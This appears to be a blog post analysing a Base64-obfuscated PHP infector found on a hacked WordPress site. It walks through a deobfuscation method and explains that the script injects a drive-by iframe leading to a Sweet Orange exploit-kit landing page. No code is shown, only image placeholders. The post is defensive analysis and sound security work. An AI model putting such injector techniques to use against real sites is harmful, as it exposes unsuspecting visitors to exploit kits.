PHP Infector

A reader wanted me to analyze a PHP file that was found on his hacked WordPress site. The script is made up of three parts as you can see.

20131012_01

The top two sections contain an array of Base64-encoded strings. The bottom section references the arrays and performs the main functions.

My first thought was to replace each of the array variables with the actual decoded strings. Then I could read the script at the bottom and figure out what it’s doing. But replacing each of the variable names with the values from the array manually would be a pain! (Anyone got a better idea? If so, let me know.)

Whenever I come across a problem, I try to find a generic solution that I can keep using in the future. Here’s what I came up with…

First I take each of the top two sections and separate the encoded values by rows. So I take this:

20131012_02

And use search/replace to make it look like this:

20131012_03

Then I modified Converter to base64-decode each row separately:

20131012_04

Then I replaced each row with a pipe delimiter (since it wasn’t being used anywhere):

20131012_05

I did the same for the second section:

20131012_06

I wrote a program that does a search and replace of the array values. I entered the search string that corresponded to the top section and pasted in the decoded strings with the pipe delimiter to get the result.

20131012_07

The second section was next.

20131012_08

All done! This script probably won’t execute properly because some of the strings need to be quoted but at least you can get a much better idea of what’s going on.

20131012_09

Basically this downloads a file from a website, gets the URL and visits it. It essentially serves up a drive-by link to unsuspecting visitors.

20131012_10

The iframe link is the landing page of Sweet Orange. The link changes every couple of minutes or so.

I’ll need to think about this more and see if there’s another generic solution. If not, I’ll add this method to Converter in the future.

This entry was posted in Malscript and tagged , , . Bookmark the permalink.